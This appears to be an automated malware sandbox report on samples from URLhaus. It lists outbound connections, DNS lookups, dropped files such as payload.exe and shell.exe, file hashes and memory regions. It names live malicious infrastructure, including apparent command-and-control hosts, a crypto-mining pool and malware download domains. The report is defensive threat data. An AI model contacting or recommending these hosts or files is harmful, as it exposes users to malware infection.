BG 87.121.86.16:80 win-network-checker.cc tcp
US 8.8.8.8:53 file.edunet.ac udp
JP 133.233.8.0:21 tcp
RU 176.111.174.140:1912 tcp
US 44.166.5.0:21 tcp
US 104.175.223.0:21 tcp
HK 103.87.10.156:50698 tcp
IR 185.79.156.69:80 osecweb.ir tcp
US 166.167.172.14:8240 166.167.172.14 tcp
VN 103.173.254.78:80 103.173.254.78 tcp
US 8.8.8.8:53 wz.3911.com udp
US 8.8.8.8:53 116.154.197.89.in-addr.arpa udp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 95.17.241.23.in-addr.arpa udp
US 8.8.8.8:53 2.129.243.104.in-addr.arpa udp
IT 46.233.169.0:21 tcp
US 40.98.179.0:21 tcp
CL 186.107.172.0:21 tcp
RU 81.4.221.0:21 tcp
KR 119.194.226.67:80 www.ojang.pe.kr tcp
CN 119.114.170.0:21 tcp
US 8.8.8.8:53 r11.o.lencr.org udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 69.156.79.185.in-addr.arpa udp
US 8.8.8.8:53 156.10.87.103.in-addr.arpa udp
US 8.8.8.8:53 78.254.173.103.in-addr.arpa udp
US 8.8.8.8:53 14.172.167.166.in-addr.arpa udp
GB 88.221.135.105:80 r11.o.lencr.org tcp
IN 117.200.145.0:21 tcp
US 8.8.8.8:53 www.google.com udp
US 64.160.226.0:21 tcp
US 159.87.6.0:21 tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
US 199.181.143.0:21 tcp
HK 52.184.113.0:21 tcp
US 208.244.233.0:21 tcp
GB 25.183.236.0:21 tcp
IR 2.186.8.0:21 tcp
GB 172.217.16.228:443 www.google.com tcp
JP 219.98.3.0:21 tcp
TW 182.235.203.0:21 tcp
KR 221.143.46.92:80 file.edunet.ac tcp
KR 211.231.99.68:80 cfs9.blog.daum.net tcp
CN 120.26.3.86:80 wz.3911.com tcp
US 23.130.175.0:21 tcp
GE 176.73.124.0:21 tcp
MX 189.164.228.0:21 tcp
NG 41.67.132.0:21 tcp
GB 40.228.235.0:21 tcp
US 206.28.225.0:21 tcp
GB 20.26.156.215:80 github.com tcp
US 8.8.8.8:53 105.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
DE 149.227.188.0:21 tcp
US 192.243.14.0:21 tcp
ES 31.214.180.12:81 31.214.180.12 tcp
CN 106.115.252.0:21 tcp
CL 186.21.150.0:21 tcp
US 40.139.38.0:21 tcp
MX 187.177.32.0:21 tcp
JP 219.178.232.0:21 tcp
US 71.24.132.0:21 tcp
GB 172.217.16.228:443 www.google.com udp
US 137.244.68.0:21 tcp
CA 142.15.35.0:21 tcp
DE 137.248.99.0:21 tcp
CA 70.28.134.0:21 tcp
AU 161.143.78.0:21 tcp
US 8.8.8.8:53 clients2.google.com udp
CN 119.16.238.0:21 tcp
GB 142.250.178.14:443 clients2.google.com tcp
GB 89.197.154.116:7810 tcp
JP 126.34.113.0:21 tcp
RU 176.111.174.138:443 tcp
US 74.103.241.0:21 tcp
US 8.8.8.8:53 92.46.143.221.in-addr.arpa udp
US 8.8.8.8:53 12.180.214.31.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 205.148.254.0:21 tcp
US 132.136.65.0:21 tcp
US 108.59.227.0:21 tcp
US 57.248.238.0:21 tcp
NZ 121.99.193.0:21 tcp
TR 5.26.174.234:80 5.26.174.234 tcp
TW 203.204.217.190:8080 203.204.217.190 tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
US 206.65.211.0:21 tcp
CH 212.243.68.0:21 tcp
GB 216.58.201.97:443 clients2.googleusercontent.com tcp
SG 8.174.69.0:21 tcp
US 38.66.91.0:21 tcp
DE 116.203.127.32:443 melkie.cyou tcp
CN 121.9.116.0:21 tcp
US 195.214.29.0:21 tcp
US 33.207.168.0:21 tcp
GB 86.31.166.0:21 tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 234.174.26.5.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
CN 58.60.79.0:21 tcp
FI 194.137.200.0:21 tcp
CN 47.104.173.216:9876 tcp
GB 165.220.134.146:80 165.220.134.146 tcp
US 64.235.32.0:21 tcp
NL 81.161.238.172:8705 tcp
KR 123.43.151.0:21 tcp
US 74.239.229.0:21 tcp
DE 91.12.219.0:21 tcp
DE 116.203.127.32:443 melkie.cyou tcp
US 8.8.8.8:53 190.217.204.203.in-addr.arpa udp
AE 194.170.159.0:21 tcp
US 63.38.254.0:21 tcp
CN 60.205.131.0:21 tcp
CN 61.147.246.0:21 tcp
SG 39.109.191.0:21 tcp
US 9.88.235.0:21 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 146.134.220.165.in-addr.arpa udp
US 8.8.8.8:53 down.mvip8.ru udp
US 104.21.8.89:443 down.mvip8.ru tcp
US 8.8.8.8:53 89.8.21.104.in-addr.arpa udp
DE 116.203.127.32:443 melkie.cyou tcp
KR 221.143.49.222:80 221.143.49.222 tcp
US 8.8.8.8:53 ns.smallsrv.com udp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 download.microsoft.com udp
DE 116.203.127.32:443 melkie.cyou tcp
GB 2.23.221.208:443 download.microsoft.com tcp
US 8.8.8.8:53 222.49.143.221.in-addr.arpa udp
US 8.8.8.8:53 3.26.192.23.in-addr.arpa udp
GB 2.23.221.208:443 download.microsoft.com tcp
RS 79.101.0.33:443 tcp
MA 102.53.15.17:80 102.53.15.17 tcp
CN 8.138.81.152:5555 tcp
CN 58.218.215.140:80 down.qqfarmer.com.cn tcp
CN 61.170.80.231:80 download.haozip.com tcp
CN 14.205.47.78:80 stdown.dinju.com tcp
CN 120.52.95.247:80 znrq.zifwxq.cn tcp
CN 120.52.95.247:80 znrq.zifwxq.cn tcp
US 8.8.8.8:53 208.221.23.2.in-addr.arpa udp
US 8.8.8.8:53 17.15.53.102.in-addr.arpa udp
DE 116.203.127.32:443 melkie.cyou tcp
US 208.95.112.1:80 ip-api.com tcp
IR 185.79.156.69:443 osecweb.ir tcp
US 20.83.148.22:80 tcp
GB 89.197.154.116:7810 tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
CN 58.47.69.177:80 download.caihong.com tcp
CA 142.67.169.45:80 142.67.169.45 tcp
RU 83.149.17.194:80 83.149.17.194 tcp
US 20.83.148.22:80 tcp
GB 88.221.135.105:80 r11.o.lencr.org tcp
US 8.8.8.8:53 194.17.149.83.in-addr.arpa udp
US 8.8.8.8:53 45.169.67.142.in-addr.arpa udp
NL 82.115.223.222:8888 82.115.223.222 tcp
ES 178.60.25.240:81 178.60.25.240 tcp
US 8.8.8.8:53 pouya.blob.core.windows.net udp
US 8.8.8.8:53 files5.uludagbilisim.com udp
US 8.8.8.8:53 dl.natgo.cn udp
KR 152.67.212.187:443 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
RU 46.17.104.173:80 ns.smallsrv.com tcp
US 208.122.221.162:80 funletters.net tcp
BG 87.120.113.235:80 tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 www.y2126.com udp
CN 221.204.72.204:80 stdown.dinju.com tcp
JP 180.22.224.1:21 tcp
CN 203.2.65.29:8081 tcp
US 209.124.70.44:443 casacoimbramaputo.com tcp
CA 50.65.169.30:81 tcp
NL 194.26.192.76:8080 tcp
CN 101.200.223.34:80 tcp
CN 124.71.73.181:85 tcp
US 34.102.78.64:9002 tcp
VN 103.42.55.251:9999 tcp
IN 122.179.136.112:80 tcp
IN 65.3.26.1:21 tcp
TW 223.139.50.1:21 tcp
US 20.83.148.22:80 tcp
FR 91.88.102.1:21 tcp
KR 116.200.225.1:21 tcp
US 152.30.58.1:21 tcp
GB 20.26.156.215:443 github.com tcp
JP 126.19.162.1:21 tcp
ES 88.12.221.1:21 tcp
US 8.8.8.8:53 needforrat.hopto.org udp
US 24.32.110.1:21 tcp
US 8.8.8.8:53 44.70.124.209.in-addr.arpa udp
US 8.8.8.8:53 112.136.179.122.in-addr.arpa udp
US 8.8.8.8:53 30.169.65.50.in-addr.arpa udp
US 8.8.8.8:53 1.58.30.152.in-addr.arpa udp
KR 203.232.37.151:80 tcp
GB 82.31.159.47:80 tcp
CA 205.151.121.1:21 tcp
KR 152.67.212.187:443 tcp
CH 193.5.175.1:21 tcp
US 17.38.66.1:21 tcp
CA 64.137.149.1:21 tcp
N/A 10.228.76.1:21 tcp
GB 89.197.154.116:7810 tcp
US 8.8.8.8:53 47.159.31.82.in-addr.arpa udp
US 8.8.8.8:53 151.37.232.203.in-addr.arpa udp
CN 182.134.237.1:21 tcp
CN 114.66.32.1:21 tcp
US 204.156.186.1:21 tcp
US 206.211.250.1:21 tcp
US 6.237.249.1:21 tcp
US 11.243.235.1:21 tcp
RU 176.111.174.138:443 tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
TR 193.3.167.1:21 tcp
FR 91.168.174.1:21 tcp
US 199.230.236.1:21 tcp
US 11.182.130.1:21 tcp
ES 212.128.235.1:21 tcp
JP 116.90.198.1:21 tcp
US 20.83.148.22:80 tcp
US 30.179.28.1:21 tcp
BR 179.237.235.1:21 tcp
AR 200.42.156.1:21 tcp
JP 1.76.8.1:21 tcp
US 33.71.239.1:21 tcp
US 20.83.148.22:80 tcp
CN 123.6.30.1:21 tcp
RU 176.111.174.138:443 tcp
CY 213.7.209.1:21 tcp
RS 77.46.142.1:21 tcp
CN 175.23.28.1:21 tcp
US 107.101.125.1:21 tcp
US 147.185.221.22:12466 week-dictionary.gl.at.ply.gg tcp
US 26.240.21.1:21 tcp
SD 154.96.244.1:21 tcp
CN 27.221.234.1:21 tcp
GB 89.197.154.116:7810 tcp
US 11.124.233.1:21 tcp
US 153.6.46.1:21 tcp
US 20.177.182.1:21 tcp
CN 14.149.215.1:21 tcp
NL 81.161.238.172:8705 tcp
TW 210.71.130.1:21 tcp
IE 52.158.119.1:21 tcp
US 143.101.183.1:21 tcp
US 75.253.182.1:21 tcp
US 73.44.234.1:21 tcp
RU 176.111.174.138:443 tcp
DE 83.218.59.1:21 tcp
BR 189.65.189.1:21 tcp
US 137.78.216.1:21 tcp
AU 58.167.19.1:21 tcp
US 20.83.148.22:80 tcp
BR 201.35.86.1:21 tcp
US 72.24.152.1:21 tcp
US 19.251.14.1:21 tcp
CN 59.213.127.1:21 tcp
US 20.83.148.22:80 tcp
EG 156.208.246.1:21 tcp
CN 125.79.89.1:21 tcp
GB 89.197.154.116:7810 tcp
US 170.162.96.1:21 tcp
PL 213.76.157.1:21 tcp
RU 176.111.174.138:443 tcp
US 158.111.153.1:21 tcp
TH 180.180.191.1:21 tcp
US 155.176.70.1:21 tcp
US 128.120.3.1:21 tcp
US 165.203.168.1:21 tcp
KE 41.57.108.1:21 tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
US 12.140.139.1:21 tcp
US 23.175.188.1:21 tcp
US 20.83.148.22:80 tcp
US 17.234.19.1:21 tcp
RU 176.111.174.138:443 tcp
IR 93.126.41.1:21 tcp
US 30.196.14.1:21 tcp
CO 191.158.237.1:21 tcp
JP 150.23.154.1:21 tcp
GB 89.197.154.116:7810 tcp
US 8.8.8.8:53 1.41.126.93.in-addr.arpa udp
DK 2.108.83.1:21 tcp
CN 223.124.221.1:21 tcp
SG 80.238.146.1:21 tcp
RU 176.111.174.138:443 tcp
GB 86.141.65.1:21 tcp
US 11.127.39.1:21 tcp
KR 49.142.169.1:21 tcp
US 20.83.148.22:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI39002\python311.dll

C:\Users\Admin\AppData\Local\Temp\_MEI39002\VCRUNTIME140.dll

C:\Users\Admin\AppData\Local\Temp\_MEI39002\base_library.zip

C:\Users\Admin\AppData\Local\Temp\_MEI39002\python3.DLL

C:\Users\Admin\AppData\Local\Temp\_MEI39002\_ctypes.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\libffi-8.dll

C:\Users\Admin\AppData\Local\Temp\_MEI39002\_uuid.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\_ssl.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\_queue.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\_overlapped.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\_multiprocessing.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\_lzma.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\_hashlib.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\select.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\_decimal.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\_cffi_backend.cp311-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\_bz2.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\_brotli.cp311-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\_asyncio.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\unicodedata.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\pyexpat.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\libssl-1_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI39002\libcrypto-1_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI39002\setuptools\_vendor\jaraco\text\Lorem ipsum.txt

C:\Users\Admin\AppData\Local\Temp\_MEI39002\charset_normalizer\md.cp311-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\charset_normalizer\md__mypyc.cp311-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\certifi\cacert.pem

C:\Users\Admin\AppData\Local\Temp\_MEI39002\multidict\_multidict.cp311-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\yarl\_quoting_c.cp311-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI39002\propcache\_helpers_c.cp311-win_amd64.pyd

C:\Users\Admin\Downloads\UrlHausFiles\TTqmYJg.exe

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe

C:\Users\Admin\Downloads\UrlHausFiles\payload1.bat

memory/1828-148-0x00007FFCD2D43000-0x00007FFCD2D45000-memory.dmp

memory/4620-149-0x00000000019C0000-0x00000000019D0000-memory.dmp

memory/1828-150-0x0000000000D10000-0x0000000000D1E000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\AV.scr

C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gldy1e1m.oex.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1916-174-0x000001F4410D0000-0x000001F4410F2000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\COMSurrogate.exe

MD5 77334f046a50530cdc6e585e59165264
SHA1 657a584eafe86df36e719526d445b570e135d217
SHA256 eb6c487307c52793e0bc4d6a74770bbea2322f32edc466b25abacec3dd0e9c08
SHA512 97936dd74d7eef8d69dae0d83b6d1554bd54d5302b5b2ff886ff66c040b083d7d086089de12b57a491cf7269a7d076e4d2a52839aaac519386b77297bc3a5c90

memory/3552-184-0x0000021604A90000-0x0000021604ABE000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

MD5 6c098287139a5808d04237dd4cdaec3f
SHA1 aea943805649919983177a66d3d28a5e964da027
SHA256 53932083665adaf933f3d524e1d8399ee4530e03b53d0d39fcbc227041e6a787
SHA512 a9430d0661271f5f988aa14165b945faf4120cc7ed4f751e8f2f4498a7d7c74f03652f45c35035027e112976206054af831d5bd8909377b3947a8a87950afa47

memory/3088-191-0x0000000140000000-0x00000001400042C8-memory.dmp

memory/4176-192-0x00000000005A0000-0x00000000005E0000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\skikda.exe

MD5 6c366d318dca314f30309b648776cee9
SHA1 e2cfbf16cf16ecda3297b71d9622b45daf52660a
SHA256 1c5db3ae8ccc55502a6f27661de3d86ff5c48eb1b7ab97448efd6c3eaad1bc36
SHA512 5eb743fad92f2dbfc3ef1a0a84d411e13d72f590fe87cdc0f588a595f95f063720d6d2d3a6b43d2a38a5e0f759a1e296c35dc9a235361f08c0051b96fe78707b

memory/4176-204-0x0000000002970000-0x0000000002976000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe

MD5 24453759fc86d34383bd0ffc722bbfb5
SHA1 495fa07508f0e79d9ce26f9179285d41303ce402
SHA256 ff4bc7221036ee331d8b913f12aec34493c11b6c2655dc15cf4281a6306126ab
SHA512 aad86f8232a676e1705319f0da2c45a89b533ecf5e8bcbc95d610683247f028b57ae7bf8b791468f6ce9b34962778cec205b48c4612c95c82967bb223ad30db9

memory/2120-219-0x00000000008D0000-0x00000000008DE000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\241.exe

MD5 d5b00b1895ec026a82818563135981ef
SHA1 60e833ebcf155e4626caf6cdc84d468aea45aa62
SHA256 c6f114c1e8044aae5362b3bf61845f46c7cc6ee23ac9eba89c8dd0977ea806e9
SHA512 3bbcda61b68c80fb0ce2128ad6afa435f7deb06ed44944a94509aab1638ca9528e120c2dbbecc6b378dbf40f37d9d4685f6fedce829dfc99b7a2ba880daa38d3

memory/2328-226-0x000001FBD5F10000-0x000001FBD5F54000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr

MD5 7f5b4cb055cb6cc6ee5377e200dbed1e
SHA1 390081e6d8a4d481bf31b722cb08695008f79ba1
SHA256 3c829e2a2eab35554a0db64a7a5cc147c8d9d1a85637ffe39252c5104f623c67
SHA512 cb408edc674c3290851af6315b35e7201665ca4ffdbd28408d8cac0f75b8977ff67f761d9fac82700ea1a2e7de7b2679978021cae576e0f05b7e57accf887511

C:\Users\Admin\Downloads\UrlHausFiles\hercules.exe

MD5 57f0eb0afcbaea023067c4d5b51e6e85
SHA1 d0f7d12b011bf99588721004a00263e3ee8faa72
SHA256 ac3a503e94f241344f10f178fe378ac1f945ccd71a88c575622d91b376e3b6ec
SHA512 aa225ad44fd9b00a0e128880f956e8596b6bd86fa44fd11f995b4dab240385e54cdef43165bddfd819d2eded9af9ea7e8710d8f63a4ec37d9ea3e9ab4f2b357f

memory/2328-239-0x000001FBD63E0000-0x000001FBD63F6000-memory.dmp

memory/4376-244-0x0000000000400000-0x0000000000459000-memory.dmp

memory/4376-245-0x0000000000400000-0x0000000000459000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\ddd.exe

MD5 37d3c4fb51f7ab9c67eec830ae6f9e1b
SHA1 7bff2668e39ebcff90f0230a78e343adf490c00b
SHA256 a45f2013adadd1e3664d28885b014dd8bca38bd5219db05f6083a3665e18ccfc
SHA512 6592785f7a24f3cf46bdb61d5338cc4fb5bb3e584a9366ee1e31dc3080f3fa262bf49a28c65c18dbb7a3efcb37ee0148ae8844b72f00a7b1c8ffa16d148b0726

C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe

MD5 00a1a14bb48da6fb3d6e5b46349f1f09
SHA1 ebc052aa404ef9cfe767b98445e5b3207425afaa
SHA256 e3fdbb915d6a6737a13da5504ace5a279796247e3b24b3b049ee58013687fe35
SHA512 643f42aefd628143ec596c7ff4c6847b24a297e6996bf840d6de3f0364fca61bdb5ce322b709b2df748d189d233973a301d371d37f4e8291be8938205c49963b

memory/776-259-0x00000000000B0000-0x00000000000FE000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\shell.exe

MD5 390c469e624b980db3c1adff70edb6dd
SHA1 dc4e0bf153666b5ca2173f480a3b62c8b822aa85
SHA256 3bb815b5af569dbad7f8f4cccc8e82000ba9b3baedf92e510253af13d60a084a
SHA512 e9c8be87d6692480e4c9ca0717ffda8c3023846722c54a74384f80ecae91a8d16be460c78a58419c9fb6e4507faf5ffa66af6f5e57a15ef35e3244c431f2c1ac

C:\Users\Admin\Downloads\UrlHausFiles\payload.exe

MD5 ca6ae34bf2b35aacb25a27f94fb1f7d5
SHA1 267e8948660634859cd6cd021df6be33f3713e8a
SHA256 fc69cdadc5ef79a1ba2b40189ecd6af230b7d9e8076f98f9fbb7a880b2b1b236
SHA512 8f5fc64f8399c4337ce5e41d85e1cd32aabc2465e0b44d52741025958c1641e23a08ea67d2d01a6847cf3faa13681a21160b3ea7f248c5ea41ba80626c246f5c

memory/2208-276-0x0000000140000000-0x0000000140004278-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

MD5 c02ba0783524ac6a002584df32d7e17c
SHA1 255cee28715d8b61153c675597d47b129f392f13
SHA256 bd7691f88d4f137f854b08bbb49450e57524b794a41a4101b4d787d1b0f0005d
SHA512 7ed3471daac7069634a2e67b140b05a1a335b02c792533b80e9baf7ec948dd5f943b337ca7a93c36c8ad09038a5e11cffabea64f41c54a00dd47d90da6b3b5a9

memory/4860-293-0x00007FF66FB30000-0x00007FF66FD6C000-memory.dmp

memory/4860-296-0x00007FF66FB30000-0x00007FF66FD6C000-memory.dmp

memory/4860-300-0x00007FF66FB30000-0x00007FF66FD6C000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\test28.exe

MD5 1fa166752d9ff19c4b6d766dee5cce89
SHA1 80884d738936b141fa173a2ed2e1802e8dfcd481
SHA256 8978e8d5c2cdf2620aa5541469ac7f395c566d7349f709c1d23dda48a0eda0d0
SHA512 5a2e8376a1408d44d025c02b27f5e6f24c14671f72677d918bf88e37e5800674cf576dd7bda8ecf08ea50d1cbeadb555abe8796421667408f3f2c5b42475ba7b

memory/3224-311-0x0000000140000000-0x0000000140004248-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

MD5 a62abdeb777a8c23ca724e7a2af2dbaa
SHA1 8b55695b49cb6662d9e75d91a4c1dc790660343b
SHA256 84bde93f884b8308546980eb551da6d2b8bc8d4b8f163469a39ccfd2f9374049
SHA512 ac04947446c4cb81bb61d9326d17249bca144b8af1ecdf1ac85b960c603e333b67ab08791e0501aee08939f54e517e6574895b1e49a588011008f8f060731169

memory/1848-314-0x0000000002EF0000-0x0000000002F26000-memory.dmp

memory/1848-324-0x00000000059B0000-0x0000000005FD8000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\soporte%5Csoporteperfect.exe

MD5 f8cd52b70a11a1fb3f29c6f89ff971ec
SHA1 6a0c46818a6a10c2c5a98a0cce65fbaf95caa344
SHA256 6f2258383b92bfaf425f49fc7a5901bfa97a334de49ce015cf65396125c13d20
SHA512 987b6b288a454b6198d4e7f94b7bba67cafe37f9654cd3cd72134a85958efd2125596ae48e66a8ee49ee3f4199dac7f136e1831f2bf4015f25d2980f0b866abe

memory/1848-329-0x0000000005750000-0x0000000005772000-memory.dmp

memory/1848-332-0x0000000006150000-0x00000000061B6000-memory.dmp

memory/4800-331-0x00000000001A0000-0x00000000001F4000-memory.dmp

memory/1848-340-0x00000000061C0000-0x0000000006226000-memory.dmp

memory/1848-351-0x0000000006230000-0x0000000006584000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe

MD5 82b64218305483038e1babd088cff080
SHA1 03873279a0b4c83b9571b621759aad544ccd0082
SHA256 f0b3eb65317809e872894728639ac919bc27e5cab4c5e34f2480fe076e0d353f
SHA512 b83c8ddbcbc48b085acda7c39bb74b31a19f4a671fc863c339cb97a35a7921703b7553437013a89e169ec03c337c7f83ebcdb9bfed8bd71bf5a8edb40eed3e8a

C:\Users\Admin\Downloads\UrlHausFiles\7rsuHCa.exe

MD5 5113346db4fbe8fba9914a8b8c4e5129
SHA1 8a3d040f8cd4678c45433af719cd99fd407a7421
SHA256 cdb3a402d4da50cdc44d709507698d0959b4d01c3b545a4bca780ef051e1f8db
SHA512 4c699420fa241a1a8a2883f5c5c45b233e8abb5ab1b5633fc2a5a46da0fdee2b2c7d21b5980c571539abd20863ff2e294b80c570a3d623df6311cf50b6676775

memory/1848-363-0x0000000006730000-0x000000000677C000-memory.dmp

memory/1828-365-0x00007FFCD2D43000-0x00007FFCD2D45000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

MD5 708adef6da5ac2ffee5f01f277560749
SHA1 3dedb41674634e6b53dfaea704754cee7bddfbe3
SHA256 0fec722a795adc9e313422c62e8ff0c7dac935dfef78da6560e38455a7739e4a
SHA512 463927da961a3a52199d2a70dbf51aed7b600e45da5e71c73c9ea9b9971c32fc77b3f1d442400a4a4fe4d0a5bc024893f633a5d898dd9e955b9ed3a8d0d3ce28

memory/1848-362-0x0000000006700000-0x000000000671E000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe

MD5 64f01094081e5214edde9d6d75fca1b5
SHA1 d7364c6fb350843c004e18fc0bce468eaa64718f
SHA256 5861fcac5dcd75e856fb96a2f0563df56e321a4be2c420618763d0bf495700a0
SHA512 a7679967d985d006a3c6b000d32b5a258b3c489bddb303c98d9cc54fa597d8a410fa66980767fcf1defe682f7952f744fd3bace26e66244a2529dbddd7a35db0

C:\Users\Admin\Downloads\UrlHausFiles\c1.exe

MD5 2609215bb4372a753e8c5938cf6001fb
SHA1 ef1d238564be30f6080e84170fd2115f93ee9560
SHA256 1490105c73976217f35fe31d65939d1d9711d370c61f3d7d892afbb07eaaec63
SHA512 3892f3e4188250ab0d3508dd9c1825fa6dfab4fc50b4bc858703123e5512071d710fd8431f94912e74eaa4ca29b40c0b1b97805a5432a07fc09c35a87e6b23d2

memory/3984-400-0x00007FFCF2630000-0x00007FFCF2825000-memory.dmp

memory/1848-402-0x00000000078A0000-0x00000000078E4000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

MD5 90aadf2247149996ae443e2c82af3730
SHA1 050b7eba825412b24e3f02d76d7da5ae97e10502
SHA256 ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a
SHA512 eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

MD5 6f154cc5f643cc4228adf17d1ff32d42
SHA1 10efef62da024189beb4cd451d3429439729675b
SHA256 bf901de5b54a593b3d90a2bcfdf0a963ba52381f542bf33299bdfcc3b5b2afff
SHA512 050fc8a9a852d87f22296be8fe4067d6fabefc2dec408da3684a0deb31983617e8ba42494d3dbe75207d0810dec7ae1238b17b23ed71668cc099a31e1f6539d1

memory/2712-422-0x0000000000590000-0x00000000008B4000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\winnit.exe

MD5 cad69031c8878d1b06315be343d99ccf
SHA1 f050a162fc3bed8152d05212c8d02088c972d4d4
SHA256 86596162c86fdb54936df369e7f5da21967f4e4a37a3798dc6ec390f1d78aee0
SHA512 01fe3d0d27750d1939eec22924504ab06008666f350570e1a8855a17a2bdf2af81d802b2648688a1a986bf9a1d0eb763a6663605a8f5aeb1cf890b501acd2fc1

memory/1848-429-0x0000000007A00000-0x0000000007A76000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\rhnew.exe

MD5 a84456172908e096d0ac6272b9503e08
SHA1 8b64d38bae9fc390e621323e9e91eb8f7def421c
SHA256 4f95dff270ac4172d470789c3fce9ae2c656565a3887afc86507ec49981bd128
SHA512 3237f19915957327d3debd46de1c52531622fba5dbb2e06c9685ca336bd4febf19c2f3dd533c5046b0e676d21f10ba10478b3bbe9dbb31823b7dc118a6413800

memory/1336-439-0x0000000000400000-0x00000000005A3000-memory.dmp

memory/4704-437-0x00000000029E0000-0x00000000039E0000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\GI59vO6.exe

MD5 5fa72774e9d750628857a68d84275833
SHA1 7eebff7d14817544cc11829e354c1dfc7f603628
SHA256 a170fa6fefc8b753ef0f88384b906ca2338365d8552012ed7aa1c0c8c7cb5a56
SHA512 9ac2715f35e107effef9f4526e6430271ca141bc5a729993e88dfa50eb20f61b15502c54f64e9596cd9bb449a1bb25c1cc98f1d12d857afdda742cdce3280838

memory/2120-446-0x0000000005820000-0x0000000005DC4000-memory.dmp

memory/2208-449-0x0000000140000000-0x0000000140004278-memory.dmp

memory/3504-450-0x0000000000520000-0x00000000009B3000-memory.dmp

memory/2120-442-0x00000000051D0000-0x000000000526C000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe

MD5 2fcfe990de818ff742c6723b8c6e0d33
SHA1 9d42cce564dcfa27b2c99450f54ba36d4b6eecaf
SHA256 cb731802d3cd29da2c01ffbb8c8ed4ef7de9d91c133b69b974583bede6bfd740
SHA512 4f20a27817de94a07071960abe0123277c0607a26de709e2ade201597df71d8c2eec7da353efba94dc6a8369b89db4caeaf9505d02b90dc30c37010a885c3613

memory/1640-441-0x0000000000A50000-0x0000000000EEF000-memory.dmp

